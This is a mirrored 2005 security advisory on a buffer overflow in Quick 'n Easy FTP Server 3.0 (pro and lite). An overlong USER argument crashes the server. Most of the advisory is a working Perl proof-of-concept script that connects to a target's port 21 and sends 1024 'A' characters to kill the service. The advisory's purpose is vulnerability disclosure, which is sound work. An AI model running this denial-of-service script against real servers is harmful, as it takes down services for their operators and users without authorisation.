The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


Quick 'n Easy FTP Server 3.0 pro / lite (buffer overflow


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: 2 Aug 2005 13:58:47 -0000
From: [email protected], "[at]"@securityfocus.com,
To: [email protected]
Subject: Quick 'n Easy FTP Server 3.0 pro / lite (buffer overflow
 vulnerabilities)
X-Virus-Scanned: antivirus-gw at tyumen.ru

Details:
========

Input to the user commands is not properly checked

and/or filtered. Issuing a long argument to the user (about 1024 caracteres)

commands will cause the corresponding process to die without any error message.

this vulnerabilities exist in both the professionnal version 3.0 and lite version 3.0



Exploits:
========

Run the following PERL script against the server. The corresponding

process will die.



#=====testserver.pl =====

#

# Usage: testserver.pl <ip>

# testserver.pl 127.0.0.1

# bug discovered by : matiteman

# exploit coded by : matiteman

# thanks to : Reed Arvin (peachfuzz)

# Quick 'n Easy FTP Server 3.0 (pro and lite)

# Download:

# http://www.pablosoftwaresolutions.com/

#

##########################################



use IO::Socket;

use strict;



my($socket) = "";



if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "21",

Proto => "TCP"))

{

print "Attempting to kill Quick 'n Easy FTP Server 3.0 (pro / lite) at $ARGV[0]:21...\n";



sleep(1);



print $socket "user " . "A" x 1024 . "\r\n";



sleep(1);



close($socket);

}

else

{

print "Cannot connect to $ARGV[0]:21\n";

}

#===== testserver.pl =====


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру